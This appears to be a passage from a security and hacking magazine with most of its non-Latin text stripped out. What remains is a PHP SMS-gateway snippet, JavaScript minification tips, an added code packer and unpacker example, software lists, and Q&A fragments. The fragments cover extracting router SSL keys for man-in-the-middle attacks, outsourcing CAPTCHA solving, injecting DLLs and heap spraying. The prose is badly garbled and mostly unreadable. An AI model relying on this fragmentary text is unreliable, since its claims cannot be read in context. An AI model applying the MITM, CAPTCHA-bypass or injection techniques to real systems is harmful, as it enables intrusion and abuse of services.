$to = "0123456789";
$url = "$baseurl/http/auth?user=$user&password=$password&api_id=$api_id";
$ret = file($url);
// a successful login answers "OK: <session id>"
$sess = explode(":", $ret[0]);
if ($sess[0] == "OK") {
    $sess_id = trim($sess[1]);
    $url = "$baseurl/http/sendmsg?session_id=$sess_id&to=$to&text=$text";
    $ret = file($url);
    $send = explode(":", $ret[0]);
    if ($send[0] == "ID")
        echo "success message ID: " . $send[1];
    else
        echo "send message failed";
} else {
    echo "Authentication failure: " . $ret[0];
    exit();
}
?>

,
API- ,
.

HTTP-.
.

(
) .

Q:
.


.
,

? , , ?
,
,
.
A: , ,
.

GNS3 (gns3.
net).
, , , Cisco. ,
, Cisco IOS,
.

Q: Java-? ,
3 .

.
A: ,

JavaScript-. ,
. :

1. :
var iCounter = 0 => i=0

2. :
x=new Array(); => x=[];
while(){}, do {} while () => for(){}
x=Math.floor(x); => x=x>>0;
x=Math.round(x); => x=x+.5>>0;
x=Math.pow(2,x); => x=1<<x;
x=x/256; => x=x>>8;

3. :
0x10 => 16
0x20000 => 1<<17
1000 => 1e3
.0001 => 1e-4

4. for-:
for(x=0;x<50;x++){} => for(x=50;x--;){}

5. , , :
for () { a+=b; c*=a; } => for() a+=b,c*=a;
function () {a+=b;} => function(){a+=b}

6. :
x=document.createElement( );document.body.appendChild(x);
=> d=document;x=d.createElement( );d.body.appendChild(x);
y=x*x*x+x*x-4;z=x*x*x+x*x+5; => y=(q=x*x*x+x*x)-4;z=q+5;

7. :
x=0;y=0; => x=y=0;
x=0;y=[0]; => y=[x=0];

Q:
JS?
A: JS- .
, JS-

. , 4
for() .
, , ,
. , :

code="o = document.createElement('a');\r\ndocument.body.appendChild(o);"


:
keys="A"
code="o = AcreateElement('a');\r\nAbody.appendChild(o);Adocument.";


document. A.
keys
,
( A).
code ,

.
,

.
:

sub_string=["o = ", "createElement('a');\r\n", "body.appendChild(o);", "document."];



, ,
.
,

. , , JsSfx (code.google.com/p/jssfx).
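An added example, not the magazine's code and not JsSfx itself: a small dictionary packer and the matching unpacker for the key/substring scheme quoted above. Each pass picks the repeated substring whose replacement saves the most bytes, swaps every occurrence for one spare "key" character and appends key + substring to the end of the text; unpacking undoes the passes in reverse order. The sample text, the key characters "A" and "B", the 40-character substring limit and the function names are assumptions made for the example. The same unpack routine is what an analyst applies to recover the plaintext of a script packed this way.

```javascript
// Non-overlapping occurrence count of `sub` in `s`, matching how split() will
// later replace it.
function countOccurrences(s, sub) {
  let n = 0;
  let i = s.indexOf(sub);
  while (i !== -1) {
    n++;
    i = s.indexOf(sub, i + sub.length);
  }
  return n;
}

// Bytes saved by replacing a substring of length `len` that occurs `count`
// times: the original costs len*count, the packed form costs one key per
// occurrence plus one separator key plus one dictionary copy of the substring.
function savings(len, count) {
  return len * count - (count + 1 + len);
}

// Most profitable substring of length 2..maxLen, or null if nothing saves bytes.
function bestSubstring(s, maxLen) {
  const seen = new Set();
  let best = null;
  let bestGain = 0;
  for (let i = 0; i < s.length; i++) {
    for (let len = 2; len <= maxLen && i + len <= s.length; len++) {
      const sub = s.slice(i, i + len);
      if (seen.has(sub)) continue;
      seen.add(sub);
      const gain = savings(len, countOccurrences(s, sub));
      if (gain > bestGain) {
        bestGain = gain;
        best = sub;
      }
    }
  }
  return best;
}

// Pack `code` with the characters of `keys`, one pass per key. A key must not
// occur in the text when it is used, otherwise the unpacker could not tell the
// placeholder from literal text; the check below refuses such keys.
function pack(code, keys) {
  let packed = code;
  let used = "";
  for (const key of keys) {
    if (packed.includes(key)) {
      throw new Error("key " + JSON.stringify(key) + " already occurs in the text");
    }
    const sub = bestSubstring(packed, 40); // assumed limit, long enough for most tokens
    if (sub === null) break; // no repeated substring left that pays for itself
    packed = packed.split(sub).join(key) + key + sub;
    used += key;
  }
  return { packed, keys: used };
}

// Restore the original: for the last key first, cut the dictionary entry off
// the end of the text and put it back in place of every placeholder.
function unpack(packed, keys) {
  let text = packed;
  for (let i = keys.length - 1; i >= 0; i--) {
    const key = keys[i];
    const sep = text.lastIndexOf(key);
    const sub = text.slice(sep + 1);
    text = text.slice(0, sep).split(key).join(sub);
  }
  return text;
}

// Constructed sample: the two-statement snippet quoted in the answer above.
const SAMPLE = "o = document.createElement('a');\r\ndocument.body.appendChild(o);";

// Round-trip check; run the file with node to see the packed form.
function demo() {
  const { packed, keys } = pack(SAMPLE, "AB");
  return {
    packed,
    keys,
    saved: SAMPLE.length - packed.length,
    roundTrip: unpack(packed, keys) === SAMPLE,
  };
}

console.log(demo());
```

With the single key "A" the packer reproduces exactly the string shown in the answer ("document." is the only substring worth replacing); a second key "B" only pays for "ment", which illustrates why this scheme gains little on short scripts and why the key characters must be chosen from characters absent from the source.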

Q: .
,
,
.
?
A:
BSOD,
.



,

. BlueScreenView (nirsoft.net), dump-,
,

.



Q: T9 QWERTY-?
A: ,
Swype (swypeinc.com).

, ,
-.
T9.
Swype .
, .
.
(swypeinc.com) -
Android, ,
.

Q: , SSL.
, -
?
A: , . , , ,
- SSL.
, ,
, .
:
. .
,
, . ,
,

. :
.
, , DD-WRT:

firmware , , VPN
. ,
? , ,
.
LittleBlackBox (code.google.com/p/littleblackbox), .

,
. -
LittleBlackBox .

.
LittleBlackBox

,
DD-WRT. , ,


,
Cisco, Linksys, D-Link, Netgear.

MITM-.

Q: SMTP
, - . :). ,
-
SMTP-?
A:
NwSMTP (github.com/khanton/NwSMTP). -,
SSL,
RBL, - .
.. -,
.

Q: ,
reCAPTCHA (google.com/recaptcha),
.
? ?
A:
, . ,
CAPTCHA
. , DeCaptcher
(decaptcher.com),
, , ,
.
API
(C/C++, C#, Perl, PHP, Python),

, ( )

.
, .

Q:

ModSecurity. -
?
A: REMO Rule Editor for
ModSecurity (netnea.com/cms/?q=remo).

, whitelist
-.

, ModSecurity
-

. REMO
Ruby
,
Ruby 1.8 .

Q: DEP
?
A: , DEP (Data Execution
Prevention) ,

Windows,
,
.
: , . DLL-
EnforcePermanentDEP (blog.didierstevens.com/2010/11/08/enforcepermanentdep).
,
DLL SetProcessDEPPolicy
PROCESS_DEP_ENABLE,

DEP.
.

Q: : DLL ?
A: . . ?
.
DLL,
.
DLL-,
PE-, , LordPE (woodmann.net/collaborative/tools/index.php/LordPE). ,
<PE Editor>
.
, PE-, <Directories>
<...> Import
table.
DLL-. Add import,
DLL,
, . ,
.

LoadDLLViaAppInit (blog.didierstevens.com/2010/10/26/update-loaddllviaappinit).


DLL-,
. , :
acrord32.exe hook-createprocess.dll;EnforcePermanentDEP.dll

>Multimedia
aTunes 2.0.1
Desktop Earth 2.1.1
Format Factory 2.60
FreeOCR OCR Software V3.0
IOGraph 0.9
IrfanView 4.28
jPDF Tweak 1.0
MediaInfo 0.7.39
MiniLyrics 7.0
MorphVOX Junior 2.7.5
MP3Gain 1.2.5
Songbird 1.8.0
UVScreenCamera 4.7beta
webcamXP 5.5.0.8
Wink 2.0
xbmc 10.0

>Misc
AM-DeadLink 4.4
Awesome Duplicate Photo Finder
Ceedo Personal
CLCL 1.1.2
Eastegger 5.9.0.559
eXtra Buttons
Just Gestures 1.0
LastPass 1.70.1
multibar 0.9.9.9
Nocs 2.2 beta
QTTabBar 1.2.2.1
RegScanner 1.83
The Batch File Rename Utility 0.6
ToolBox 2.85
Windy - Window Manager
Xinorbis 5.2
YoWindow 2.0

>Games
Hedgewars 0.9.15

>>WINDOWS
>Development
ASMTool 1.3.1BETA
BitRock InstallBuilder 7.0.1
CodeLite 2.8.0.4537
CodeLobster PHP Edition 3.6.4
DiffMerge 3.3.0
E-TextEditor 2.0.1
EmEditor Professional 10.0.4
HTTP Debugger Pro 4.4
IntellijIDEA 10
Komodo Edit 6.0.3
NSIS 2.46
PyPy 1.4
ReSharper 5.1.1
SharpDevelop 4.0 (beta)
Spyder v2.0.5
SQL Uniform 2.1
Syser Kernel Debugger 1.99
TortoiseSVN 1.6.12
UltraGram 4.2.50
Unique 0.25
VisualSVN 2.0.5
WaveMaker 6.2.5
WinHex 15.8

>>UNIX
>Desktop
Album Player 0.3.1
Asunder 2.0
BRL-CAD 7.18.0
Camera Life 2.6.3
FxMovieManager 4.6
GoldenDict 1.0

>System
Apache Logs Viewer 2.32
BleachBit 0.8.6
Comodo System-Cleaner 3.0
Defraggler 2.01
Disk Bench 2.6.1.0
EASEUS Todo Backup Home 2.0
HeavyLoad 3.0
HP USB Disk Storage Format Tool
2.1.8
Macrium Reflect Free 4.2
Macro Recorder 4.71 Trial
MBRCheck
Parted Magic 5.8
VirtualBox 4.0
VMWare Disk Mount GUI
VMware Workstation 7.1
win-get

>Security
Armitage 12.13.10
CFF Explorer VII
hashcat 0.35
Immunity Debugger v1.80
IOCTL Fuzzer 1.2
JavaSnoop 1.0
Kernel Detective v1.4.1
lfimap 1.4.5
OllyDbg 2.01a
OWASP HTTP Post Tool 3.6
Peach 2.3.7
Snort 2.9.0.2
sqlinject-finder
SSA v2.0 Beta 002
thicknet
Web Crawler 0.2
Windows System State Analyzer

>Net
CCNA Network Visualizer 6.0
Connectify 2.1.0
Cyberduck 4.0b8
Dropbox 1.0.10
Evernote 4.1.0
GNS3 0.7.3
Helicon Ape
NetBalancer
NetDrive 1.2.0.4
NetworkMiner 0.92
Opera 11.00
PrinterShare 2.3.4
Shelfsters Desktop Tool
TeamSpeak3 3.0.0
TeamViewer 6.0
wipfw 0.2.8
WirelessMon 3.1

>Security
Aanval 6
Armitage 12.13.10
cvechecker 2.0
Dns2tcp 0.5.2
droidmap 0.01
floppyfw 3.0.14
honggfuzz 0.1
ipset 5.2

>Net
bareFTP 0.3.7
cURL 7.21.3
Downpour 0.2
Getmail 4.20
Google Chrome 8.0.552.224
Kiwix 0.9
LeechCraft 0.4.0
Lftp 4.1.1
LinkChecker 6.1
LogJam 4.6.0
Mozilla Firefox 3.6.13
Opera 11.00
qBittorrent 2.5
quIRC 0.6.2
Speedometer 2.7
Spicebird 0.8
w3m 0.5.2
Xymon 4.2.3

>Games
Zero Ballistics 2.0

>Devel
Arcadia 0.9.2
BitRock InstallBuilder 7.0.1
Cadaz Linux 1.0
CodeLite 2.8.0.4537
Codemetre 0.29.2
FormBuilder 1.1.4
GSL shell 1.0
IntellijIDEA 10
Lapack 3.3.0
LXRAD 0.6
Modula-2 1.0
MyJSQLView 3.23
Neoeedit 1.0
PyPy 1.4
Spyderlib 2.0
SQL Uniform 2.1
Unique 0.25
WaveMaker 6.2.5

Google Earth 6
Merkaartor 0.16.3
mhWaveEdit 1.4.20
MoreAmp 0.1.26
Personal File Manager 2.10.8
Pinta 0.5
Popper 0.24
QComicBook 0.7.2
Scilab 5.3.0
Videoporama 0.8
Wally 2.4.1
XNeur 0.11.1

>>MAC
Alarms 1.1.1
AutoRate 1.6
Calibre 0.7.34
cURL 7.21.3
Fraise 3.7.3
Fseventer 2.7.6
Kaleidoscope 1.1.1
Knapsack 2.1
MarsEdit 3.1.4
Parallels Desktop 6 Mac
Postbox 2.1.0
Server Admin Tools 10.6
Soulver 2.0.2
Sparrow beta 7
Steam 1.1
Transmit 4.1.4
Velocity 2.0
Wireshark 1.4.2
Woopra 1.4

>X-distr
Chromium OS - VMware
Chromium OS -
Linux Mint 10

>System
AQEMU 0.8.1
ATI Catalyst 10.12
Backintime 1.0.4
Coreutils 8.8
FindDup
Linux Kernel 2.6.36.2
nVidia 260.19.29
QEMU 0.13.0
RemoteBox 0.5
Skulker 2.1
Softgun 0.19
TimeVault 0.7.5
UnusedPkg 0.6
VirtualBox 4.0.0
X.Org 7.6

JavaSnoop 1.0
Lfimap 1.4.7
Ostinato 0.3
Packet Fence 2.0.0
PuzlBox 1.0.2.2
quefuzz 0.7.2
Skipfish 1.82
Snorby 2.0
Snort 2.9.0.2
SQLInject Finder
Suricata 1.0.2
Sydbox 0.7.2
THC-Hydra 5.9
thicknet
Tor 0.2.1.28
USBsploit 0.5
VMvicnum 14
volatilitux 1.0
WackoPicko
xplico 0.6.1
Zero Wine 2.0



HTTP://WWW2

GmadS
www.madnet.name/tools/madss

Goozzy
www.goozzy.com


, ,
Google. ,
. GmadS, ,

. . . , , ,
(ReverseIP),
.

? ,
. ,
, -. . , . , , ,
! -
. :). ,
, .
, Goozzy
.

Heap Spraying generator
bit.ly/small_heap_spray_generator

HackerTarget
www.hackertarget.com

Heap Spraying,
.
, (, IE)
- ,
.
, NOP-
( ) -.
NOP, NOP
, ,
. NOP -,
! Heap Spraying
Java-,
.

, ,
cloud- . HackerTarget
x-toolz,
.
: Nmap, OpenVas, SQLiX,
sqlmap, Nikto, Joomla Security Scan, Sub Domain Scanner
fingerprinting-.
:
, e-mail ( ),
.



>> coding

3 -
: 12 , 6
3 .

, ? ? .
- .
